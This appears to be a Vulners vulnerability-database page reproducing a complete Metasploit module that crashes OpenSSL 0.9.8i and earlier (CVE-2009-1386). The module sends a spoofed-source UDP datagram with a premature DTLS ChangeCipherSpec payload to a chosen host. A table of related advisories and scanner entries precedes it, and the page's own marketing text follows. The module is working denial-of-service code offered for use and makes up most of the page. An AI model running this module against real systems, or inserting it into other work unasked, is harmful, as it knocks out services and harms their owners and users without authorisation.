| Reporter | Title | Published | Views | Family All 110 |
|---|---|---|---|---|
| OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit | 4 Jun 200900:00 | – | zdt | |
| CentOS 5 : openssl (CESA-2009:1335) | 6 Jan 201000:00 | – | nessus | |
| Debian DSA-1888-1 : openssl, openssl097 - cryptographic weakness | 24 Feb 201000:00 | – | nessus | |
| EulerOS Virtualization 3.0.1.0 : openssl (EulerOS-SA-2019-1548) | 14 May 201900:00 | – | nessus | |
| HP System Management Homepage < 6.0.0.96 / 6.0.0-95 Multiple Vulnerabilities | 27 Apr 201000:00 | – | nessus | |
| Mandriva Linux Security Advisory : openssl (MDVSA-2009:238) | 22 Sep 200900:00 | – | nessus | |
| Mandriva Linux Security Advisory : openssl (MDVSA-2009:310) | 4 Dec 200900:00 | – | nessus | |
| MiracleLinux 3 : openssl-0.9.8e-12AXS3 (AXSA:2009-388:03) | 14 Jan 202600:00 | – | nessus | |
| NewStart CGSL CORE 5.04 / MAIN 5.04 : openssl098e Multiple Vulnerabilities (NS-SA-2019-0020) | 12 Aug 201900:00 | – | nessus | |
| OpenSSL 0.9.8 < 0.9.8i Vulnerability | 4 Jan 201200:00 | – | nessus |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Exploit::Capture
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenSSL DTLS ChangeCipherSpec Remote DoS',
'Description' => %q{
This module performs a Denial of Service Attack against Datagram TLS in OpenSSL
version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a
ChangeCipherspec Datagram before a ClientHello.
},
'Author' => [
'Jon Oberheide <jon[at]oberheide.org>', #original code
'theLightCosine' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2009-1386' ],
[ 'OSVDB', '55073'],
],
'DisclosureDate' => '2000-04-26'))
register_options([
Opt::RPORT(80),
Opt::RHOST
]
)
deregister_options('FILTER','PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')
end
def run
open_pcap
print_status("Creating DTLS ChangeCipherSpec Datagram...")
p = PacketFu::UDPPacket.new
p.ip_daddr = datastore['RHOST']
p.ip_src = rand(0x100000000)
p.ip_ttl = 44
p.udp_sport = 34060
p.udp_dport = datastore['RPORT'].to_i
p.payload = "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01"
p.recalc
print_status("Sending Datagram to target...")
capture_sendto(p, '255.255.255.255')
close_pcap
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation